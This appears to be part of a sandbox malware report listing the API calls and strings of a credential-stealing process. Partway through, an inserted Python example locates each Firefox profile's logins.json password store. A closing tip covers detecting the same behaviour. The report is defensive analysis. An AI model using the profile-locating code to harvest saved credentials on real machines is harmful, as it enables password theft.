                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: FileRead
                    • String ID:
                    • API String ID: 2738559852-0
                    APIs
                    • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: FileWrite
                    • String ID:
                    • API String ID: 3934441357-0
                    APIs
                    • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: FreeLibrary
                    • String ID:
                    • API String ID: 3664257935-0
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@
                    • String ID:
                    • API String ID: 613200358-0
                    APIs
                    • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    APIs
                    • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@
                    • String ID:
                    • API String ID: 613200358-0
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@
                    • String ID:
                    • API String ID: 613200358-0
                    APIs
                    • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: FreeLibrary
                    • String ID:
                    • API String ID: 3664257935-0
                    APIs
                    • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                    Similarity
                    • API ID: EnumNamesResource
                    • String ID:
                    APIs
                    • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                    Similarity
                    • API ID: FreeLibrary
                    • String ID:
                    APIs
                    • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                    Similarity
                    • API ID: CloseFind
                    • String ID:
                    APIs
                    • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                    Similarity
                    • API ID: Open
                    • String ID:
                    APIs
                    • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                    Similarity
                    • API ID: AttributesFile
                    • String ID:
                    Similarity
                    • API ID: ??3@
                    • String ID:
                    APIs
                    • memset.MSVCRT ref: 004095FC
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                      • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                      • Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
                      • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                    Similarity
                    • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                    • String ID:
                    APIs
                    • memset.MSVCRT ref: 00445426
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                      • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                      • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                    Similarity
                    • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                    • String ID:
                    APIs
                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                      • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                    • memcpy.MSVCRT ref: 00406942
                    Similarity
                    • API ID: ??2@FilePointermemcpy
                    • String ID:
                    APIs
                      • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                    • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                    Similarity
                    • API ID: File$CloseCreateErrorHandleLastRead
                    • String ID:
                    APIs
                      • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                    • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                    Similarity
                    • API ID: ??2@??3@
                    • String ID:
                    APIs
                    • EmptyClipboard.USER32 ref: 004098EC
                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                    • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                    • GlobalFix.KERNEL32(00000000), ref: 00409927
                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                    • GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                    • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                    • GetLastError.KERNEL32 ref: 0040995D
                    • CloseHandle.KERNEL32(?), ref: 00409969
                    • GetLastError.KERNEL32 ref: 00409974
                    • CloseClipboard.USER32 ref: 0040997D
                    Similarity
                    • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                    • String ID:
                    APIs
                    • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                    • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                    • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                    • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                    Similarity
                    • API ID: Library$AddressFreeLoadMessageProc
                    • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                    APIs
                    • EmptyClipboard.USER32 ref: 00409882
                    • wcslen.MSVCRT ref: 0040988F
                    • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                    • GlobalFix.KERNEL32(00000000), ref: 004098AC
                    • memcpy.MSVCRT ref: 004098B5
                    • GlobalUnWire.KERNEL32(00000000), ref: 004098BE
                    • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                    • CloseClipboard.USER32 ref: 004098D7
                    Similarity
                    • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
                    • String ID:
                    APIs
                    • GetLastError.KERNEL32 ref: 004182D7
                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                    • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                    • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                    • LocalFree.KERNEL32(?), ref: 00418342
                    • ??3@YAXPAX@Z.MSVCRT ref: 00418370
                      • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7622DF80,?,0041755F,?), ref: 00417452
                      • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                    Similarity
                    • API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
                    • String ID: OsError 0x%x (%u)
                    APIs
                      • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                      • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                      • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                    • OpenClipboard.USER32(?), ref: 00411878
                    • GetLastError.KERNEL32 ref: 0041188D
                    • DeleteFileW.KERNEL32(?), ref: 004118AC
                      • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                      • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                      • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                      • Part of subcall function 004098E2: GlobalFix.KERNEL32(00000000), ref: 00409927
                      • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                      • Part of subcall function 004098E2: GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                      • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                      • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                      • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                    Similarity
                    • API ID: ClipboardFile$Global$CloseTemp$AllocDataDeleteDirectoryEmptyErrorHandleLastNameOpenPathReadSizeWindowsWire
                    • String ID:
                    Similarity
                    • API ID: ??2@??3@memcpymemset
                    • String ID:
                    APIs
                    • GetVersionExW.KERNEL32(?), ref: 004173BE
                    Similarity
                    • API ID: Version
                    • String ID:
                    APIs
                    • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                    Similarity
                    • API ID: NtdllProc_Window
                    • String ID:
                    APIs
                    • _wcsicmp.MSVCRT ref: 004022A6
                    • _wcsicmp.MSVCRT ref: 004022D7
                    • _wcsicmp.MSVCRT ref: 00402305
                    • _wcsicmp.MSVCRT ref: 00402333
                      • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                      • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                    • memset.MSVCRT ref: 0040265F
                    • memcpy.MSVCRT ref: 0040269B
                      • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                      • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                    • memcpy.MSVCRT ref: 004026FF
                    • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                    Similarity
                    • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                    • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                    Similarity
                    • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                    • String ID: :stringdata$ftp://$http://$https://
                    APIs
                    • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                    • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                    • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                    • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                    • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                    • GetWindowRect.USER32(00000000,?), ref: 0041407D
                    • GetWindowRect.USER32(?,?), ref: 00414088
                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                    • GetDC.USER32 ref: 004140E3
                    • wcslen.MSVCRT ref: 00414123
                    • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                    • ReleaseDC.USER32(?,?), ref: 00414181
                    • _snwprintf.MSVCRT ref: 00414244
                    • SetWindowTextW.USER32(?,?), ref: 00414258
                    • SetWindowTextW.USER32(?,00000000), ref: 00414276
                    • GetDlgItem.USER32(?,00000001), ref: 004142AC
                    • GetWindowRect.USER32(00000000,?), ref: 004142BC
                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                    • GetClientRect.USER32(?,?), ref: 004142E1
                    • GetWindowRect.USER32(?,?), ref: 004142EB
                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                    • GetClientRect.USER32(?,?), ref: 0041433B
                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                    Similarity
                    • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                    • String ID: %s:$EDIT$STATIC
                    APIs
                    • EndDialog.USER32(?,?), ref: 00413221
                    • GetDlgItem.USER32(?,000003EA), ref: 00413239
                    • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                    • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                    • memset.MSVCRT ref: 00413292
                    • memset.MSVCRT ref: 004132B4
                    • memset.MSVCRT ref: 004132CD
                    • memset.MSVCRT ref: 004132E1
                    • memset.MSVCRT ref: 004132FB
                    • memset.MSVCRT ref: 00413310
                    • GetCurrentProcess.KERNEL32 ref: 00413318
                    • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                    • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                    • memset.MSVCRT ref: 004133C0
                    • GetCurrentProcessId.KERNEL32 ref: 004133CE
                    • memcpy.MSVCRT ref: 004133FC
                    • wcscpy.MSVCRT ref: 0041341F
                    • _snwprintf.MSVCRT ref: 0041348E
                    • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                    • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                    • SetFocus.USER32(00000000), ref: 004134B7
                    Strings
                    • {Unknown}, xrefs: 004132A6
                    • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                    • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                    • API String ID: 4111938811-1819279800
                    • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                    • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                    • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                    • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                    APIs
                    • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                    • GetDlgItem.USER32(?,000003EE), ref: 00401238
                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                    • GetDlgItem.USER32(?,000003EC), ref: 00401273
                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                    • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                    • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                    • SetCursor.USER32(00000000,?,?), ref: 0040129E
                    • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                    • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                    • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                    • SetBkMode.GDI32(?,00000001), ref: 004012F2
                    • SetTextColor.GDI32(?,00C00000), ref: 00401300
                    • GetSysColorBrush.USER32(0000000F), ref: 00401308
                    • GetDlgItem.USER32(?,000003EE), ref: 00401329
                    • EndDialog.USER32(?,?), ref: 0040135E
                    • DeleteObject.GDI32(?), ref: 0040136A
                    • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                    • ShowWindow.USER32(00000000), ref: 00401398
                    • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                    • ShowWindow.USER32(00000000), ref: 004013A7
                    • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                    • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                    • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                    • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                    • String ID:
                    • API String ID: 829165378-0
                    • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                    • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                    • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                    • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                    APIs
                    • memset.MSVCRT ref: 00404172
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                    • wcscpy.MSVCRT ref: 004041D6
                    • wcscpy.MSVCRT ref: 004041E7
                    • memset.MSVCRT ref: 00404200
                    • memset.MSVCRT ref: 00404215
                    • _snwprintf.MSVCRT ref: 0040422F
                    • wcscpy.MSVCRT ref: 00404242
                    • memset.MSVCRT ref: 0040426E
                    • memset.MSVCRT ref: 004042CD
                    • memset.MSVCRT ref: 004042E2
                    • _snwprintf.MSVCRT ref: 004042FE
                    • wcscpy.MSVCRT ref: 00404311
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                    • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                    • API String ID: 2454223109-1580313836
                    • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                    • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                    • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                    • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
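The string set in the block above (General, IsRelative, Path, Profile%d, profiles.ini, together with the GetFileAttributesW subcall) is the pattern of a routine that walks Firefox's profiles.ini to locate each profile directory and the credential store inside it; the "logins" string in a later block of this dump points the same way. The Python below is an added illustration of that lookup, not code from the report or from the analysed sample; the profiles.ini content, user name and paths are constructed.

```python
"""Added example: resolve Firefox profile directories from profiles.ini
and name the credential store a password-recovery tool would read.
Not code from the analysed sample; the input below is constructed."""
import configparser
import ntpath
import re
from typing import List

# Constructed profiles.ini in the layout Firefox writes under
# %APPDATA%\Mozilla\Firefox (profile names and paths are made up).
SAMPLE_PROFILES_INI = """\
[General]
StartWithLastProfile=1
Version=2

[Profile0]
Name=default
IsRelative=1
Path=Profiles/abcd1234.default
Default=1

[Profile1]
Name=work
IsRelative=0
Path=D:\\FirefoxData\\work.profile
"""

PROFILE_SECTION = re.compile(r"^Profile(\d+)$")


def resolve_profiles(ini_text: str, base_dir: str) -> List[str]:
    """Return absolute profile directories, in Profile0, Profile1, ... order.

    IsRelative=1 means Path is relative to the directory holding
    profiles.ini (base_dir); IsRelative=0 means Path is already absolute.
    Forward slashes are normalised to backslashes so the result is a
    Windows path regardless of the host this runs on.
    """
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str  # keep key case exactly as Firefox writes it
    cp.read_string(ini_text)

    numbered = []
    for section in cp.sections():
        match = PROFILE_SECTION.match(section)
        if match:
            numbered.append((int(match.group(1)), section))

    dirs = []
    for _, section in sorted(numbered):
        path = cp.get(section, "Path", fallback="")
        if not path:
            continue  # malformed section: no Path, nothing to open
        is_relative = cp.get(section, "IsRelative", fallback="1") == "1"
        path = path.replace("/", "\\")
        if is_relative:
            path = ntpath.join(base_dir, path)
        dirs.append(ntpath.normpath(path))
    return dirs


def candidate_login_stores(ini_text: str, base_dir: str) -> List[str]:
    """logins.json for every profile: the file holding the saved logins
    that a recovery tool parses (the "logins" string in this dump)."""
    return [ntpath.join(d, "logins.json")
            for d in resolve_profiles(ini_text, base_dir)]


if __name__ == "__main__":
    base = r"C:\Users\victim\AppData\Roaming\Mozilla\Firefox"  # constructed
    for store in candidate_login_stores(SAMPLE_PROFILES_INI, base):
        print(store)
```

The same walk, run in reverse, is a useful hunt: any process other than firefox.exe opening profiles.ini followed by logins.json in each profile directory is behaving like the routine dumped here.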
                    APIs
                      • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                    • SetMenu.USER32(?,00000000), ref: 00411453
                    • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                    • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                    • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                    • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                    • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                    • memcpy.MSVCRT ref: 004115C8
                    • ShowWindow.USER32(?,?), ref: 004115FE
                    • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                    • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                    • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                    • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                    • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                      • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                      • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                    • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                    • API String ID: 4054529287-3175352466
                    • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                    • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                    • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                    • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: wcscat$_snwprintfmemset$wcscpy
                    • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                    • API String ID: 3143752011-1996832678
                    • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                    • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                    • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                    • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                    APIs
                    • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                    • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                    • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                    • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                    • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                    • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                    • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                    • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                    • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressProc$HandleModule
                    • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                    • API String ID: 667068680-2887671607
                    • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
